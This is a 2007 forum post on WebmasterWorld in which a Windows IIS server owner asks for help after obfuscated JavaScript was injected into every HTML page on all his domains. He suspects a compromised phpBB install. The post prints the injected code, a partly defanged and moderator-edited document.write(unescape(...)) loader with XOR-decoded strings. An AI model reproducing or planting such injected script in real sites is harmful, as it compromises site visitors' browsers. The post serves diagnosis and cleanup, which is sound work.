homepage Welcome to WebmasterWorld Guest from 54.226.136.179
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
Malicious script code added to all pages on webserver
gibsongk55

5+ Year Member



 
Msg#: 3477313 posted 7:47 pm on Oct 14, 2007 (gmt 0)

Hi,

Am new here. I am running a Windows IIs server and i have been getting some script code added to the end of each html page on all domains i am running. Most of the time the code is the same. I was running phpbb forums and suspect the virus came from there but not sure. I contacted the support forum for phpbb community and they said they would look into the security part of the code but never a response from them. So i deleted the databases for those forums and ftp'd the pages on all sites again only to find after a week all domains and pages are infected again. Below is the script code i am finding. I changed the script tag just in case <>

Any help would be appreciated.

Thanks,

Gibs

<!--[Q]--><*iadded this so it will not function>document.write(unescape("%3Cscript%3Eif%28rqX%21
%3D1%29%7Bfunction%20Cv%28oh%29%7Breturn%20oh%7Dtry
%7Dvar%20unW%3D%27ddvdrvd5vdUvdxvdsvdmvdfvd9vdFvdZvdzvd
pvdLvdkvdMvdyvdjvdDvd7vd6vdXvdevdAvdlvdWvdOvdYvdqvd8vdo
vdCvdbvdVvdKvdJvdHvdNvdnvdIvdavdTvd4vdPvd3vdwvdSvdcvdBv
dhvdGvdRvdivdgvrdvrrvr5vrUvrxvrsvrmvrfvr9vrFvrZvrzvrpvr
LvrkvrMvryvrjvrDvr7vr6vrXvrevrAvrlvrWvrOvrY%27%3Bvar
%20LWg%3DCv%28%27v%27%29%2CHGC%3DArray%28AGr%28%27166
%27%29%2C24816%5E24601%2CAGr%28%27249%27%29%2CAGr%28
%5E11335%2CAGr%28%27186%27%29%2C3434%5E3457%2CAGr
dRdpdndpdzrrdjdndxdSrUdVdydWdUdpdbdorjdqdPdzd5dFdHd8dZ
dmdKd5dUd8dWdmd8rjr5d8dHd8dZdmdMdRdxd9dUdWdHd8dRdAdVdb
dorjdKdrd8dmd6dmdmdUdxrDdFdmd8dpdMdRdrdUd5dRd7dpdsdzd6
dAdVdbdorjdKrdd8dxdNrddmdqr7dVdbdorjdKdDdxdPdmrddqdTdV
dKr5d8dZdNdmrddAd7did7didAdVdpdUd8dmdFdUdZdpdodYdzdVdp
dBddrxdrd5dUdxdsdmdf%27%3Bvar%20tOA%3DString%28%29%3Bu
nW%3DunW.split%28LWg%29%3Bfor%20%28Zhz%3D0%3BZhz%3CQXg
.length%3BZhz+%3D2%29%7BYuA%3DQXg.substr%28Zhz%2C2%29%
%3DString.fromCharCode%28HGC%5BbJt%5D%5E154%29%3B
%7Ddocument.write%28tOA%29%3B%7Dcatch%28nPX%29%7B%7D
%7Dvar%20rqX%3D1%3C/script%3E"))</i added this so it will not function><!--[/Q]-->

[edited by: encyclo at 8:23 pm (utc) on Oct. 14, 2007]
[edit reason] fixed side-scroll and obfuscated exploit code [/edit]

 

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved